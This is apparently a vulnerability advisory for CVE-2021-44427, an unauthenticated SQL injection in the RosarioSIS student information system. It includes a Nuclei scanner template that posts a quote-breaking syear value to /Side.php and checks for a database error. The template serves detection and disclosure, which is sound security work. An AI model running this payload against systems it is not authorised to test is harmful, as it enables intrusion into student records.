CVE-2021-44427: Rosario Student Information System Unauthenticated SQL Injection

日期: 2025-08-01 | 影响软件: Rosario Student Information System | POC: 已公开

漏洞描述

An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.

PoC代码[已公开]

id: CVE-2021-44427

info:
  name: Rosario Student Information System Unauthenticated SQL Injection
  author: furkansayim,xShuden
  severity: critical
  description: An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database, modify data, or execute arbitrary SQL commands.
  remediation: Upgrade to version 8.1.1 or higher.
  reference:
    - https://gitlab.com/francoisjacquet/rosariosis/-/issues/328
    - https://twitter.com/RemotelyAlerts/status/1465697928178122775
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44427
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-44427
    cwe-id: CWE-89
    epss-score: 0.84943
    epss-percentile: 0.99302
    cpe: cpe:2.3:a:rosariosis:rosariosis:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: rosariosis
    product: rosariosis
  tags: cve,cve2021,sqli,rosariosis,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/Side.php"

    body: "sidefunc=update&syear=111'"

    headers:
      Content-Type: application/x-www-form-urlencoded; charset=utf-8

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "DB Execute Failed. ERROR:"
          - "unterminated quoted string"
        condition: and

      - type: word
        part: header
        words:
          - "RosarioSIS="

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100eaec7d4cb5f96ef696a42c5f886129dca7a29317de21302cfdd37bb702e89f100220519d54efc9f077f7189f2fc63214df0541020d11af2c9c16354cf36e2174e9e1:922c64590222798bb761d5b6d8e72950

相关漏洞推荐